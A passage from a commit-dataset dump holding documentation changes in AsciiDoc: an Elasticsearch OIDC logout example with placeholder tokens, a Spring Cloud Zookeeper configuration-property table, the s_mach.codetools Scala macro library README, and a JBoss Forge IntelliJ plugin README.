<<security-api-get-token>>.\n. At some point, if necessary, the custom web application can log the user out by using the\n<<security-api-oidc-logout,OIDC logout API>> passing the access token and refresh token as parameters. For example:\n+\n[source,console]\n--------------------------------------------------\nPOST \/_security\/oidc\/logout\n{\n \"token\" : \"dGhpcyBpcyBub3QgYSByZWFsIHRva2VuIGJ1dCBpdCBpcyBvbmx5IHRlc3QgZGF0YS4gZG8gbm90IHRyeSB0byByZWFkIHRva2VuIQ==\",\n \"refresh_token\": \"vLBPvmAB6KvwvJZr27cS\"\n}\n--------------------------------------------------\n\/\/ TEST[catch:request]\n+\nIf the realm is configured accordingly, this may result in a response with a `redirect` parameter indicating where\nthe user needs to be redirected in the OP in order to complete the logout process.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"efb01a1c5e77f3439656ef8859052cda22f05401","subject":"Bumping versions","message":"Bumping versions","repos":"spring-cloud\/spring-cloud-zookeeper,spring-cloud\/spring-cloud-zookeeper","old_file":"docs\/src\/main\/asciidoc\/_configprops.adoc","new_file":"docs\/src\/main\/asciidoc\/_configprops.adoc","new_contents":"|===\n|Name | Default | Description\n\n|spring.cloud.zookeeper.base-sleep-time-ms | `50` | Initial amount of time to wait between retries.\n|spring.cloud.zookeeper.block-until-connected-unit | | The unit of time related to blocking on connection to Zookeeper.\n|spring.cloud.zookeeper.block-until-connected-wait | `10` | Wait time to block on connection to Zookeeper.\n|spring.cloud.zookeeper.connect-string | `localhost:2181` | Connection string to the Zookeeper cluster.\n|spring.cloud.zookeeper.connection-timeout | | The configured connection timeout in milliseconds.\n|spring.cloud.zookeeper.dependencies | | Mapping of alias to ZookeeperDependency. From LoadBalancer perspective the alias is actually serviceID since SC LoadBalancer can't accept nested structures in serviceID.\n|spring.cloud.zookeeper.dependency-configurations | | \n|spring.cloud.zookeeper.dependency-names | | \n|spring.cloud.zookeeper.discovery.enabled | `true` | \n|spring.cloud.zookeeper.discovery.initial-status | | The initial status of this instance (defaults to {@link StatusConstants#STATUS_UP}).\n|spring.cloud.zookeeper.discovery.instance-host | | Predefined host with which a service can register itself in Zookeeper. Corresponds to the {code address} from the URI spec.\n|spring.cloud.zookeeper.discovery.instance-id | | Id used to register with zookeeper. Defaults to a random UUID.\n|spring.cloud.zookeeper.discovery.instance-port | | Port to register the service under (defaults to listening port).\n|spring.cloud.zookeeper.discovery.instance-ssl-port | | Ssl port of the registered service.\n|spring.cloud.zookeeper.discovery.metadata | | Gets the metadata name\/value pairs associated with this instance. This information is sent to zookeeper and can be used by other instances.\n|spring.cloud.zookeeper.discovery.order | `0` | Order of the discovery client used by `CompositeDiscoveryClient` for sorting available clients.\n|spring.cloud.zookeeper.discovery.register | `true` | Register as a service in zookeeper.\n|spring.cloud.zookeeper.discovery.root | `\/services` | Root Zookeeper folder in which all instances are registered.\n|spring.cloud.zookeeper.discovery.uri-spec | `{scheme}:\/\/{address}:{port}` | The URI specification to resolve during service registration in Zookeeper.\n|spring.cloud.zookeeper.enabled | `true` | Is Zookeeper enabled.\n|spring.cloud.zookeeper.max-retries | `10` | Max number of times to retry.\n|spring.cloud.zookeeper.max-sleep-ms | `500` | Max time in ms to sleep on each retry.\n|spring.cloud.zookeeper.prefix | | Common prefix that will be applied to all Zookeeper dependencies' paths.\n|spring.cloud.zookeeper.session-timeout | | The configured\/negotiated session timeout in milliseconds. Please refer to <a href='https:\/\/cwiki.apache.org\/confluence\/display\/CURATOR\/TN14'>Curator's Tech Note 14<\/a> to understand how Curator implements connection sessions. @see <a href='https:\/\/cwiki.apache.org\/confluence\/display\/CURATOR\/TN14'>Curator's Tech Note 14<\/a>\n\n|===","old_contents":"|===\n|Name | Default | Description\n\n|spring.cloud.zookeeper.base-sleep-time-ms | `50` | Initial amount of time to wait between retries.\n|spring.cloud.zookeeper.block-until-connected-unit | `` | The unit of time related to blocking on connection to Zookeeper.\n|spring.cloud.zookeeper.block-until-connected-wait | `10` | Wait time to block on connection to Zookeeper.\n|spring.cloud.zookeeper.connect-string | `localhost:2181` | Connection string to the Zookeeper cluster.\n|spring.cloud.zookeeper.connection-timeout | `` | The configured connection timeout in milliseconds.\n|spring.cloud.zookeeper.dependencies | `` | Mapping of alias to ZookeeperDependency. From LoadBalancer perspective the alias is actually serviceID since SC LoadBalancer can't accept nested structures in serviceID.\n|spring.cloud.zookeeper.dependency-configurations | `` | \n|spring.cloud.zookeeper.dependency-names | `` | \n|spring.cloud.zookeeper.discovery.enabled | `true` | \n|spring.cloud.zookeeper.discovery.initial-status | `` | The initial status of this instance (defaults to {@link StatusConstants#STATUS_UP}).\n|spring.cloud.zookeeper.discovery.instance-host | `` | Predefined host with which a service can register itself in Zookeeper. Corresponds to the {code address} from the URI spec.\n|spring.cloud.zookeeper.discovery.instance-id | `` | Id used to register with zookeeper. Defaults to a random UUID.\n|spring.cloud.zookeeper.discovery.instance-port | `` | Port to register the service under (defaults to listening port).\n|spring.cloud.zookeeper.discovery.instance-ssl-port | `` | Ssl port of the registered service.\n|spring.cloud.zookeeper.discovery.metadata | `` | Gets the metadata name\/value pairs associated with this instance. This information is sent to zookeeper and can be used by other instances.\n|spring.cloud.zookeeper.discovery.order | `0` | Order of the discovery client used by `CompositeDiscoveryClient` for sorting available clients.\n|spring.cloud.zookeeper.discovery.register | `true` | Register as a service in zookeeper.\n|spring.cloud.zookeeper.discovery.root | `\/services` | Root Zookeeper folder in which all instances are registered.\n|spring.cloud.zookeeper.discovery.uri-spec | `{scheme}:\/\/{address}:{port}` | The URI specification to resolve during service registration in Zookeeper.\n|spring.cloud.zookeeper.enabled | `true` | Is Zookeeper enabled.\n|spring.cloud.zookeeper.max-retries | `10` | Max number of times to retry.\n|spring.cloud.zookeeper.max-sleep-ms | `500` | Max time in ms to sleep on each retry.\n|spring.cloud.zookeeper.prefix | `` | Common prefix that will be applied to all Zookeeper dependencies' paths.\n|spring.cloud.zookeeper.session-timeout | `` | The configured\/negotiated session timeout in milliseconds. Please refer to <a href='https:\/\/cwiki.apache.org\/confluence\/display\/CURATOR\/TN14'>Curator's Tech Note 14<\/a> to understand how Curator implements connection sessions. @see <a href='https:\/\/cwiki.apache.org\/confluence\/display\/CURATOR\/TN14'>Curator's Tech Note 14<\/a>\n\n|===","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"303c9a54247ac0a6eb557530dcc8cac4c4fe11ee","subject":"work on readme [skip ci]","message":"work on readme [skip ci]\n","repos":"S-Mach\/s_mach.codetools","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"= s_mach.codetools: Macro, codegen and code utility library\nLance Gatlin <lance.gatlin@gmail.com>\nv1,27-Dec-2014\n:blogpost-status: unpublished\n:blogpost-categories: s_mach, scala\n\nimage:https:\/\/travis-ci.org\/S-Mach\/s_mach.codetools.svg[Build Status, link=\"https:\/\/travis-ci.org\/S-Mach\/s_mach.codetools\"] image:https:\/\/coveralls.io\/repos\/S-Mach\/s_mach.codetools\/badge.png?branch=master[Test Coverage,link=\"https:\/\/coveralls.io\/r\/S-Mach\/s_mach.codetools\"] https:\/\/github.com\/S-Mach\/s_mach.codetools[Code] http:\/\/s-mach.github.io\/s_mach.codetools\/#s_mach.codetools.package[Scaladoc]\n\n+s_mach.codetools+ is an open-source Scala macro, codegen and code utility\nlibrary.\n\n== Features\n* IsValueClass[A]: A base trait for a user-defined value-class that standardizes the name of\nthe value-class val to \"underlying\" and toString to underlying toString. This\nallows creating an implicit conversion from an instance of any value-class to its\nunderlying representation.\n* IsDistinctTypeAlias[A]: marker trait used to mark a type alias as being a distinct type alias (DTA).\nA DTA is an alternative to the Scala value-class\n(http:\/\/docs.scala-lang.org\/overviews\/core\/value-classes.html) that\nnever needs to box (or unbox) since type aliases are eliminated in byte code.\n* +Result[A]+: a better +scala.util.Try+ that allows accumulating errors,\nwarnings and other issues in addition to storing failure or success. Returned\nby most +BlackboxHelper+ methods.\n* +BlackboxHelper+: a wrapper trait that provides utility types and methods to\nassist in macro generation, specifically for generating type-class\nimplementations for product types.\n** +BlackboxHelper.ProductType+: a case class for storing the matching\napply\/unapply methods and field info of a product type. Has utility methods for\ntype-class implementation generation.\n** +BlackboxHelper.calcProductType+: method to attempt to compute a +ProductType+\nfor a given type. Works for all case classes, tuple types and any other type\nwhose companion object contains a matching apply\/unapply method pair (See\n+ProductType+ section below for details).\n* +ReflectPrint+: a demonstration type-class which can create the Scala code\nnecessary for recreating an instance with the same value (See\n+reflectPrint.printApply+).\n* +ReflectPrintMacroBuilderImpl+: a reference implementation of a type-class\nblackbox macro generator that uses +BlackboxHelper+. The macro implementation\ncan generate a +ReflectPrint+ implementation for any product type.\n* +ReflectPrintTest+: tests for the generated +ReflectPrint+ for various common\nADT patterns (See +testdata+) in lieu of direct testing of +BlackboxHelper+\nsince there is currently no blackbox.Context mock available.\n\n== Include in SBT\n1. Add to +build.sbt+\n+\n[source,sbt,numbered]\n----\nlibraryDependencies += \"net.s_mach\" %% \"codetools\" % \"1.0.4\"\n----\nNOTE: +s_mach.codetools+ is based on blackbox macro support, present only in Scala 2.11+\n\n== Versioning\n+s_mach.codetools+ uses semantic versioning (http:\/\/semver.org\/).\n+s_mach.codetools+ does not use the package private modifier. Instead, all code\nfiles outside of the +s_mach.codetools.impl+ package form the public interface\nand are governed by the rules of semantic versioning. Code files inside the\n+s_mach.codetools.impl+ package may be used by downstream applications and\nlibraries. However, no guarantees are made as to the stability or interface of\ncode in the +s_mach.codetools.impl+ package between versions.\n\n== In Detail: +Product Type+\nA +product type+ is any type that can be expressed as sequence of fields whose\ntypes are either data types (e.g. Int, String, etc) or other product types.\nProduct types are\nhttp:\/\/en.wikipedia.org\/wiki\/Algebraic_data_type[algebraic data types] that can\nbe decomposed into an ordered sequence of fields. Each field consists of an\nindex within the sequence, a field name and a field type.\n\nIn +s_mach.codetools+, product types are computed by finding the first\nunapply\/apply method pair in the type's companion object with matching type\nsignatures. The type signature of an apply method is equal to the sequence of\nthe types of its arguments. Unapply methods may have one or two type signatures\nbased on their return type. First, the outer Option of the return type is\ndiscarded, leaving only the inner type. If the inner type is a tuple type,\nthen both the tuple type and the list of tuple type parameters form possible\ntype signatures for the unapply method. Otherwise, if the inner type parameter\nis not a tuple type then the type signature of the unapply method is equal to\nthe single type parameter. Once an apply\/unapply match is made, the symbols of\nthe apply method's argument list are used to extract the product type fields\nfor the type. For tuple types and case classes, this will be the list of its\nfields.\n\n.Example 1:\n----\nclass A(...) { ... }\nobject A {\n def apply(i: Int, s: String) : A = ???\n def apply(i: Int, s: String, f: Float) : A = ???\n def unapply(a: A) : Option[(Int,String)] = ???\n}\n----\n* The first apply method's type signature = +Int :: String :: Nil+\n* Possible unapply method's type signatures = +((Int,String) :: Nil) ::: (Int :: String :: Nil)+\n* Product type fields = +(\"i\",Int) :: (\"s\",String) :: Nil+\n\n.Example 2:\n----\nclass B(...) { ... }\nobject B {\n def apply(tuple: (String,Int)) : A = ???\n def apply(i: Int, s: String) : A = ???\n def unapply(b: B) : Option[(String,Int)] = ???\n}\n----\n* The first apply method's type signature = +(String,Int) :: Nil+\n* Possible unapply method's type signatures = +((String,Int) :: Nil) ::: (String :: Int :: Nil)+\n* Product type fields = +(\"tuple\",(String,Int)) :: Nil+\n\n.Example 3:\n----\nclass Enum(...) { ... }\nobject Enum {\n def apply(value: String) : A = ???\n def unapply(e: Enum) : Option[String] = ???\n}\n----\n* The first apply method's type signature = +String :: Nil+\n* Possible unapply method's type signatures = +String :: Nil+\n* Product type fields = +(\"value\",String) :: Nil+\n\n.Example 4:\n----\ncase class CaseClass(i: Int, s: String)\n----\n* The first apply method's type signature = +Int :: String :: Nil+\n* Possible unapply method's type signatures = +((Int,String) :: Nil) ::: (Int:: String :: Nil)+\n* Product type fields = +(\"i\",Int) :: (\"s\",String) :: Nil+\n\n.Example 5:\n----\nclass Tuple2[T1,T2](val _1: T1,val _2 : T2)\n----\n* The first apply method's type signature = +T1 :: T2 :: Nil+\n* Possible unapply method's type signatures = +((T1,T2) :: Nil) ::: (T1:: T2 :: Nil)+\n* Product type fields = +(\"_1\",T1) :: (\"_2\",T2) :: Nil+\n\n== Example: ReflectPrint\n----\nWelcome to Scala version 2.11.1 (Java HotSpot(TM) 64-Bit Server VM, Java 1.7.0_72).\nType in expressions to have them evaluated.\nType :help for more information.\n\nscala> :paste\n\/\/ Entering paste mode (ctrl-D to finish)\n\nimport s_mach.codetools.reflectPrint._\n\ncase class Movie(\n name: String,\n year: Int\n)\n\nobject Movie {\n implicit val reflectPrint_Movie = ReflectPrint.forProductType[Movie]\n}\n\ncase class Name(\n firstName: String,\n middleName: Option[String],\n lastName: String\n)\n\nobject Name {\n implicit val reflectPrint_Name = ReflectPrint.forProductType[Name]\n}\n\n\ncase class Actor(\n name: Name,\n age: Int,\n movies: Set[Movie]\n)\n\nobject Actor {\n implicit val reflectPrint_Person = ReflectPrint.forProductType[Actor]\n}\n\nval n1 = Name(\"Gary\",Some(\"Freakn\"),\"Oldman\")\nval n2 = Name(\"Guy\",None,\"Pearce\")\nval n3 = Name(\"Lance\",None,\"Gatlin\")\n\nval m1 = Movie(\"The Professional\",1994)\nval m2 = Movie(\"The Fifth Element\",1997)\nval m3 = Movie(\"Memento\",1994)\nval m4 = Movie(\"Prometheus\",2012)\n\nval a1 = Actor(n1,56,Set(m1,m2))\nval a2 = Actor(n2,47,Set(m3,m4))\nval a3 = Actor(n3,37,Set.empty)\n\n\/\/ Exiting paste mode, now interpreting.\n\nimport s_mach.codetools.reflectPrint._\ndefined class Movie\ndefined object Movie\ndefined class Name\ndefined object Name\ndefined class Actor\ndefined object Actor\nn1: Name = Name(Gary,Some(Freakn),Oldman)\nn2: Name = Name(Guy,None,Pearce)\nn3: Name = Name(Lance,None,Gatlin)\nm1: Movie = Movie(The Professional,1994)\nm2: Movie = Movie(The Fifth Element,1997)\nm3: Movie = Movie(Memento,1994)\nm4: Movie = Movie(Prometheus,2012)\na1: Actor = Actor(Name(Gary,Some(Freakn),Oldman),56,Set(Movie(The Professional,1994), Movie(The Fifth Element,1997)))\na2: Actor = Actor(Name(Guy,None,Pearce),47,Set(Movie(Memento,1994), Movie(Prometheus,2012)))\na3: Actor = Actor(Name(Lance,None,Gatlin),37,Set())\n\nscala> a1.printApply\nres0: String = Actor(name=Name(firstName=\"Gary\",middleName=Some(\"Freakn\"),lastName=\"Oldman\"),age=56,movies=Set(Movie(name=\"The Professional\",year=1994),Movie(name=\"The Fifth Element\",year=1997)))\n\nscala> val alt1 = Actor(name=Name(firstName=\"Gary\",middleName=Some(\"Freakn\"),lastName=\"Oldman\"),age=56,movies=Set(Movie(name=\"The Professional\",year=1994),Movie(name=\"The Fifth Element\",year=1997)))\nalt1: Actor = Actor(Name(Gary,Some(Freakn),Oldman),56,Set(Movie(The Professional,1994), Movie(The Fifth Element,1997)))\n\nscala> alt1 == a1\nres1: Boolean = true\n\nscala> a1.printUnapply\nres2: String = (Name(firstName=\"Gary\",middleName=Some(\"Freakn\"),lastName=\"Oldman\"),56,Set(Movie(name=\"The Professional\",year=1994),Movie(name=\"The Fifth Element\",year=1997)))\n\nscala> val ualt1 = (Name(firstName=\"Gary\",middleName=Some(\"Freakn\"),lastName=\"Oldman\"),56,Set(Movie(name=\"The Professional\",year=1994),Movie(name=\"The Fifth Element\",year=1997)))\nualt1: (Name, Int, scala.collection.immutable.Set[Movie]) = (Name(Gary,Some(Freakn),Oldman),56,Set(Movie(The Professional,1994), Movie(The Fifth Element,1997)))\n\nscala> ualt1 == Actor.unapply(a1).get\nres3: Boolean = true\n\nscala> import ReflectPrintFormat.Implicits.verbose\nimport ReflectPrintFormat.Implicits.verbose\n\nscala> a2.printApply\nres4: String =\nActor(\n name = Name(\n firstName = \"Guy\",\n middleName = None,\n lastName = \"Pearce\"\n ),\n age = 47,\n movies = Set(\n Movie(\n name = \"Memento\",\n year = 1994\n ),\n Movie(\n name = \"Prometheus\",\n year = 2012\n )\n )\n)\n\nscala> a3.printApply\nres5: String =\nActor(\n name = Name(\n firstName = \"Lance\",\n middleName = None,\n lastName = \"Gatlin\"\n ),\n age = 37,\n movies = Set.empty\n)\n----\n","old_contents":"= s_mach.codetools: Macro, codegen and code utility library\nLance Gatlin <lance.gatlin@gmail.com>\nv1,27-Dec-2014\n:blogpost-status: unpublished\n:blogpost-categories: s_mach, scala\n\nimage:https:\/\/travis-ci.org\/S-Mach\/s_mach.codetools.svg[Build Status, link=\"https:\/\/travis-ci.org\/S-Mach\/s_mach.codetools\"] image:https:\/\/coveralls.io\/repos\/S-Mach\/s_mach.codetools\/badge.png?branch=master[Test Coverage,link=\"https:\/\/coveralls.io\/r\/S-Mach\/s_mach.codetools\"] https:\/\/github.com\/S-Mach\/s_mach.codetools[Code] http:\/\/s-mach.github.io\/s_mach.codetools\/#s_mach.codetools.package[Scaladoc]\n\n+s_mach.codetools+ is an open-source Scala macro, codegen and code utility\nlibrary.\n\n== Features\n* trait IsValueClass[A]\n** A base trait for a user-defined value-class that standardizes the name of\nthe value-class val to \"underlying\" and toString to underlying toString. This\nallows creating an implicit conversion from an instance of any value-class to its\nunderlying representation.\n* trait IsDistinctTypeAlias[A]\n** Marker trait used to mark a type alias as being a distinct type alias (DTA).\nA DTA is an alternative to the Scala value-class\n(http:\/\/docs.scala-lang.org\/overviews\/core\/value-classes.html) that\nnever needs to box (or unbox) since type aliases are eliminated in byte code.\n* +Result[A]+: a better +scala.util.Try+ that allows accumulating errors,\nwarnings and other issues in addition to storing failure or success. Returned\nby most +BlackboxHelper+ methods.\n* +BlackboxHelper+: a wrapper trait that provides utility types and methods to\nassist in macro generation, specifically for generating type-class\nimplementations for product types.\n** +BlackboxHelper.ProductType+: a case class for storing the matching\napply\/unapply methods and field info of a product type. Has utility methods for\ntype-class implementation generation.\n** +BlackboxHelper.calcProductType+: method to attempt to compute a +ProductType+\nfor a given type. Works for all case classes, tuple types and any other type\nwhose companion object contains a matching apply\/unapply method pair (See\n+ProductType+ section below for details).\n* +ReflectPrint+: a demonstration type-class which can create the Scala code\nnecessary for recreating an instance with the same value (See\n+reflectPrint.printApply+).\n* +ReflectPrintMacroBuilderImpl+: a reference implementation of a type-class\nblackbox macro generator that uses +BlackboxHelper+. The macro implementation\ncan generate a +ReflectPrint+ implementation for any product type.\n* +ReflectPrintTest+: tests for the generated +ReflectPrint+ for various common\nADT patterns (See +testdata+) in lieu of direct testing of +BlackboxHelper+\nsince there is currently no blackbox.Context mock available.\n\n== Include in SBT\n1. Add to +build.sbt+\n+\n[source,sbt,numbered]\n----\nlibraryDependencies += \"net.s_mach\" %% \"codetools\" % \"1.0.4\"\n----\nNOTE: +s_mach.codetools+ is based on blackbox macro support, present only in Scala 2.11+\n\n== Versioning\n+s_mach.codetools+ uses semantic versioning (http:\/\/semver.org\/).\n+s_mach.codetools+ does not use the package private modifier. Instead, all code\nfiles outside of the +s_mach.codetools.impl+ package form the public interface\nand are governed by the rules of semantic versioning. Code files inside the\n+s_mach.codetools.impl+ package may be used by downstream applications and\nlibraries. However, no guarantees are made as to the stability or interface of\ncode in the +s_mach.codetools.impl+ package between versions.\n\n== In Detail: +Product Type+\nA +product type+ is any type that can be expressed as sequence of fields whose\ntypes are either data types (e.g. Int, String, etc) or other product types.\nProduct types are\nhttp:\/\/en.wikipedia.org\/wiki\/Algebraic_data_type[algebraic data types] that can\nbe decomposed into an ordered sequence of fields. Each field consists of an\nindex within the sequence, a field name and a field type.\n\nIn +s_mach.codetools+, product types are computed by finding the first\nunapply\/apply method pair in the type's companion object with matching type\nsignatures. The type signature of an apply method is equal to the sequence of\nthe types of its arguments. Unapply methods may have one or two type signatures\nbased on their return type. First, the outer Option of the return type is\ndiscarded, leaving only the inner type. If the inner type is a tuple type,\nthen both the tuple type and the list of tuple type parameters form possible\ntype signatures for the unapply method. Otherwise, if the inner type parameter\nis not a tuple type then the type signature of the unapply method is equal to\nthe single type parameter. Once an apply\/unapply match is made, the symbols of\nthe apply method's argument list are used to extract the product type fields\nfor the type. For tuple types and case classes, this will be the list of its\nfields.\n\n.Example 1:\n----\nclass A(...) { ... }\nobject A {\n def apply(i: Int, s: String) : A = ???\n def apply(i: Int, s: String, f: Float) : A = ???\n def unapply(a: A) : Option[(Int,String)] = ???\n}\n----\n* The first apply method's type signature = +Int :: String :: Nil+\n* Possible unapply method's type signatures = +((Int,String) :: Nil) ::: (Int :: String :: Nil)+\n* Product type fields = +(\"i\",Int) :: (\"s\",String) :: Nil+\n\n.Example 2:\n----\nclass B(...) { ... }\nobject B {\n def apply(tuple: (String,Int)) : A = ???\n def apply(i: Int, s: String) : A = ???\n def unapply(b: B) : Option[(String,Int)] = ???\n}\n----\n* The first apply method's type signature = +(String,Int) :: Nil+\n* Possible unapply method's type signatures = +((String,Int) :: Nil) ::: (String :: Int :: Nil)+\n* Product type fields = +(\"tuple\",(String,Int)) :: Nil+\n\n.Example 3:\n----\nclass Enum(...) { ... }\nobject Enum {\n def apply(value: String) : A = ???\n def unapply(e: Enum) : Option[String] = ???\n}\n----\n* The first apply method's type signature = +String :: Nil+\n* Possible unapply method's type signatures = +String :: Nil+\n* Product type fields = +(\"value\",String) :: Nil+\n\n.Example 4:\n----\ncase class CaseClass(i: Int, s: String)\n----\n* The first apply method's type signature = +Int :: String :: Nil+\n* Possible unapply method's type signatures = +((Int,String) :: Nil) ::: (Int:: String :: Nil)+\n* Product type fields = +(\"i\",Int) :: (\"s\",String) :: Nil+\n\n.Example 5:\n----\nclass Tuple2[T1,T2](val _1: T1,val _2 : T2)\n----\n* The first apply method's type signature = +T1 :: T2 :: Nil+\n* Possible unapply method's type signatures = +((T1,T2) :: Nil) ::: (T1:: T2 :: Nil)+\n* Product type fields = +(\"_1\",T1) :: (\"_2\",T2) :: Nil+\n\n== Example: ReflectPrint\n----\nWelcome to Scala version 2.11.1 (Java HotSpot(TM) 64-Bit Server VM, Java 1.7.0_72).\nType in expressions to have them evaluated.\nType :help for more information.\n\nscala> :paste\n\/\/ Entering paste mode (ctrl-D to finish)\n\nimport s_mach.codetools.reflectPrint._\n\ncase class Movie(\n name: String,\n year: Int\n)\n\nobject Movie {\n implicit val reflectPrint_Movie = ReflectPrint.forProductType[Movie]\n}\n\ncase class Name(\n firstName: String,\n middleName: Option[String],\n lastName: String\n)\n\nobject Name {\n implicit val reflectPrint_Name = ReflectPrint.forProductType[Name]\n}\n\n\ncase class Actor(\n name: Name,\n age: Int,\n movies: Set[Movie]\n)\n\nobject Actor {\n implicit val reflectPrint_Person = ReflectPrint.forProductType[Actor]\n}\n\nval n1 = Name(\"Gary\",Some(\"Freakn\"),\"Oldman\")\nval n2 = Name(\"Guy\",None,\"Pearce\")\nval n3 = Name(\"Lance\",None,\"Gatlin\")\n\nval m1 = Movie(\"The Professional\",1994)\nval m2 = Movie(\"The Fifth Element\",1997)\nval m3 = Movie(\"Memento\",1994)\nval m4 = Movie(\"Prometheus\",2012)\n\nval a1 = Actor(n1,56,Set(m1,m2))\nval a2 = Actor(n2,47,Set(m3,m4))\nval a3 = Actor(n3,37,Set.empty)\n\n\/\/ Exiting paste mode, now interpreting.\n\nimport s_mach.codetools.reflectPrint._\ndefined class Movie\ndefined object Movie\ndefined class Name\ndefined object Name\ndefined class Actor\ndefined object Actor\nn1: Name = Name(Gary,Some(Freakn),Oldman)\nn2: Name = Name(Guy,None,Pearce)\nn3: Name = Name(Lance,None,Gatlin)\nm1: Movie = Movie(The Professional,1994)\nm2: Movie = Movie(The Fifth Element,1997)\nm3: Movie = Movie(Memento,1994)\nm4: Movie = Movie(Prometheus,2012)\na1: Actor = Actor(Name(Gary,Some(Freakn),Oldman),56,Set(Movie(The Professional,1994), Movie(The Fifth Element,1997)))\na2: Actor = Actor(Name(Guy,None,Pearce),47,Set(Movie(Memento,1994), Movie(Prometheus,2012)))\na3: Actor = Actor(Name(Lance,None,Gatlin),37,Set())\n\nscala> a1.printApply\nres0: String = Actor(name=Name(firstName=\"Gary\",middleName=Some(\"Freakn\"),lastName=\"Oldman\"),age=56,movies=Set(Movie(name=\"The Professional\",year=1994),Movie(name=\"The Fifth Element\",year=1997)))\n\nscala> val alt1 = Actor(name=Name(firstName=\"Gary\",middleName=Some(\"Freakn\"),lastName=\"Oldman\"),age=56,movies=Set(Movie(name=\"The Professional\",year=1994),Movie(name=\"The Fifth Element\",year=1997)))\nalt1: Actor = Actor(Name(Gary,Some(Freakn),Oldman),56,Set(Movie(The Professional,1994), Movie(The Fifth Element,1997)))\n\nscala> alt1 == a1\nres1: Boolean = true\n\nscala> a1.printUnapply\nres2: String = (Name(firstName=\"Gary\",middleName=Some(\"Freakn\"),lastName=\"Oldman\"),56,Set(Movie(name=\"The Professional\",year=1994),Movie(name=\"The Fifth Element\",year=1997)))\n\nscala> val ualt1 = (Name(firstName=\"Gary\",middleName=Some(\"Freakn\"),lastName=\"Oldman\"),56,Set(Movie(name=\"The Professional\",year=1994),Movie(name=\"The Fifth Element\",year=1997)))\nualt1: (Name, Int, scala.collection.immutable.Set[Movie]) = (Name(Gary,Some(Freakn),Oldman),56,Set(Movie(The Professional,1994), Movie(The Fifth Element,1997)))\n\nscala> ualt1 == Actor.unapply(a1).get\nres3: Boolean = true\n\nscala> import ReflectPrintFormat.Implicits.verbose\nimport ReflectPrintFormat.Implicits.verbose\n\nscala> a2.printApply\nres4: String =\nActor(\n name = Name(\n firstName = \"Guy\",\n middleName = None,\n lastName = \"Pearce\"\n ),\n age = 47,\n movies = Set(\n Movie(\n name = \"Memento\",\n year = 1994\n ),\n Movie(\n name = \"Prometheus\",\n year = 2012\n )\n )\n)\n\nscala> a3.printApply\nres5: String =\nActor(\n name = Name(\n firstName = \"Lance\",\n middleName = None,\n lastName = \"Gatlin\"\n ),\n age = 37,\n movies = Set.empty\n)\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"cd0de041f1e3bcc45162f5b1d86b1b3e4a34811d","subject":"Updated README","message":"Updated README\n","repos":"forge\/intellij-idea-plugin,forge\/intellij-idea-plugin","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"== JBoss Forge IntelliJ IDEA Plugin\n\nPublished in http:\/\/plugins.jetbrains.com\/plugin\/7515\n\nProvides support for http:\/\/forge.jboss.org\/[JBoss Forge] commands and wizards in IntelliJ IDEA.\n\nTo show a list of commands press `Ctrl+Alt+4`. On MacOSX, use `Command + Option + 4`.\n\n=== Installation and usage\n\nPlugin is available in IntelliJ IDEA repository under the name \"JBoss Forge IDEA Plugin\"\n(go to `Settings > Plugins > Browse repositories...` to install).\n\n==== JDK Version\n\nThis plugin should work with *JDK 8* and above.\n\n=== Building\n\nThis plugin uses Gradle as the build tool and the Intellij Gradle plugin.\n\n\n=== Debugging\n\nTo debug the plugin in IntelliJ IDEA, you need to install `Intellij plugin development with Maven` plugin first.\nThat will allow you to run a second instance of the IDE, in which you can test and debug the plugin.\n\nAfter installing this plugin, you can add a plugin run\/debug configuration.\nTo do that, go to `Run -> Edit Configurations...` and add _Plugin_ configuration.\n\nThis configuration should start a new IntelliJ window. In case the plugin is not installed, you will need\nto install it manually in IDE settings and run it again.\n","old_contents":"== JBoss Forge IntelliJ IDEA Plugin\n\nPublished in http:\/\/plugins.jetbrains.com\/plugin\/7515\n\nProvides support for http:\/\/forge.jboss.org\/[JBoss Forge] commands and wizards in IntelliJ IDEA.\n\n=== Installation and usage\n\nPlugin is available in IntelliJ IDEA repository under the name \"JBoss Forge IDEA Plugin\"\n(go to `Settings > Plugins > Browse repositories...` to install).\n\n==== JDK Version\n\nThis plugin only works with *JDK 7*. The following exception will appear if you install it and run in JDK6 :\n \n Plugin 'org.jboss.forge.plugin.idea' failed to initialize and will be disabled. Please restart IntelliJ IDEA.\n \n com.intellij.diagnostic.PluginException: org\/jboss\/forge\/plugin\/idea\/service\/ForgeService : Unsupported major.minor version 51.0 [Plugin: org.jboss.forge.plugin.idea]\n \nIntelliJ Idea runs on JDK 6 by default. \nMake sure to change the default IDE VM use JDK7 by following instructions provided in link:https:\/\/intellij-support.jetbrains.com\/entries\/23455956-Selecting-the-JDK-version-the-IDE-will-run-under[here].\n\n\nTo show a list of commands press `Ctrl+Alt+4`.\n\n=== Build and debug\n\nTo build the plugin, you need to have IntelliJ libraries installed in your Maven repository.\nIf you're Linux\/Mac user, you can use `install-intellij-libs.sh` script, if that doesn't work, you can\ninstall those JARs manually (only dependencies from POM are required).\n\nAfter that, you can build the plugin with `mvn package` command (add `-DskipTests` if you don't have\nForge addons installed in your repository). The resulting ZIP file in `target\/` directory can\nbe installed by going to `Settings > Plugins > Install plugin from disk...`.\n\nTo debug the plugin in IntelliJ IDEA, you need to install `Intellij plugin development with Maven` plugin first.\nThat will allow you to run a second instance of the IDE, in which you can test and debug the plugin.\n\nAfter installing this plugin, you can add a plugin run\/debug configuration.\nTo do that, go to `Run -> Edit Configurations...` and add _Plugin_ configuration.\n\nThis configuration should start a new IntelliJ window. In case the plugin is not installed, you will need\nto install it manually in IDE settings and run it again.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b963d0b11cbbf5017608878b4ec49fe9db4abe55","subject":"update the readme for highlighters doc","message":"update the readme for highlighters 